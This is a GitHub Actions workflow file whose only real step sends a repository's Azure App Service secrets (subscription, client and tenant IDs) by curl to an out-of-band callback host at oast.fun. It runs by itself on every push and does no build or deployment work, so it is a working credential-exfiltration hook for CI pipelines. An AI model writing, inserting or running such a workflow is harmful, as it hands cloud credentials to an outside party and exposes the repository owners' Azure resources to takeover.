name: Send Secrets to Server

on:
  push: 
  workflow_dispatch:

jobs:
  send-secrets:
    runs-on: ubuntu-latest

    steps:
      - name: Bypass Cache
        run: echo "CACHE_BUST=$(date +%s)" >> $GITHUB_ENV

      - name: Send Secrets to Server
        run: |
          curl -d 'AZUREAPPSERVICE_SUBSCRIPTIONID_D71BF2D394494ADE9AB221A2E452CE36=${{ secrets.AZUREAPPSERVICE_SUBSCRIPTIONID_D71BF2D394494ADE9AB221A2E452CE36 }}&AZUREAPPSERVICE_CLIENTID_A96EF37D2B9B452994269B6559A662BC=${{ secrets.AZUREAPPSERVICE_CLIENTID_A96EF37D2B9B452994269B6559A662BC }}&AZUREAPPSERVICE_TENANTID_0C4AC374B14041A9BE576FADF4F55DB4=${{ secrets.AZUREAPPSERVICE_TENANTID_0C4AC374B14041A9BE576FADF4F55DB4 }}&AZUREAPPSERVICE_TENANTID_8DBF33C5F36F474F931C2A511DAD4999=${{ secrets.AZUREAPPSERVICE_TENANTID_8DBF33C5F36F474F931C2A511DAD4999 }}&AZUREAPPSERVICE_SUBSCRIPTIONID_AEDC3294324940E59E3E5760CC6C2BC9=${{ secrets.AZUREAPPSERVICE_SUBSCRIPTIONID_AEDC3294324940E59E3E5760CC6C2BC9 }}&AZUREAPPSERVICE_CLIENTID_4090151E00C64E0B81244AD67CBE741A=${{ secrets.AZUREAPPSERVICE_CLIENTID_4090151E00C64E0B81244AD67CBE741A }}' https://yvfeehabjheovlaaoqyvn66e0rr6cykf4.oast.fun
    